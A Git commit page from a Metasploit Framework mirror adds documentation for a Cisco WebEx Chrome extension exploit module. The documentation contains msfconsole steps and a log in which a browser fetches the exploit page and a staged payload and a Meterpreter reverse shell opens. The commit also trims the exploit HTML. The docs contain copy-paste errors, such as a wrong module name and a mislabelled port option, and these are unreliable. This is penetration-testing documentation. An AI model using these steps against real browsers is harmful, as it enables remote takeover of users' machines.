infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add module doc and remove the word EXPLOIT from document title

bug/bundler_fix
William Webb 2017-01-26 13:36:18 -06:00
parent d87cb4b085
commit 94f9971300
No known key found for this signature in database
GPG Key ID: 341763D0308DA650
2 changed files with 55 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
documentation/modules/exploit/windows/misc/cisco_webex_ext.md Normal file
View File

@ -0,0 +1,55 @@
Cisco WebEx is a suite of applications for online meeting organization and video conferencing.
Included in this suite are extensions for popular web browsers which ease use and provide supplemental
features.
Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an
attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.
## Vulnerable Application
Cisco WebEx Chrome Extension 1.0.1 is known to be affected.
## Verification Steps
**Using cisco_webex_ext**
After the encrypted communication is enabled, you are ready to use
hp_dataprotector_encrypted_comms. Here is what you do:
1. Start msfconsole
2. Do: ```use exploit/windows/misc/cisco_webex_ext```
3. Do: ```set SRVHOST [IP ADDRESS]```
4. Do: ```set SRVPORT [PAYLOAD NAME]```
5. Do: ```set URIPATH [ARBITRARY URI]```
6. Do: ```Choose a payload and set any specific options```
6. Do: ```run```, after a target browses to the generated URL, you should receive a session like the following:
```
msf > use exploits/windows/misc/cisco_webex_ext
msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151
srvhost => 10.6.0.151
msf exploit(cisco_webex_ext) > set srvport 4567
srvport => 4567
msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting
uripath => not_a_very_good_meeting
msf exploit(cisco_webex_ext) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.6.255.229:4444
[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting
[*] Server started.
msf exploit(cisco_webex_ext) > [*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting
[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html
[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[*] 10.6.0.151 cisco_webex_ext - Sending exploit html ...
[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N
[*] 10.6.0.151 cisco_webex_ext - From:
[*] 10.6.0.151 cisco_webex_ext - Sending payload ...
[*] Sending stage (957487 bytes) to 10.6.255.229
[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600
msf exploit(cisco_webex_ext) >
```

1
modules/exploits/windows/misc/cisco_webex_ext.rb
View File

@ -59,7 +59,6 @@ def exploit_html(cli, req_uri)
html = %Q~ html = %Q~
<html> <html>
<head> <head>
<title>Cisco WebEx Exploit</title>
<script> <script>
var msg = { var msg = {
GpcProductRoot: "WebEx", GpcProductRoot: "WebEx",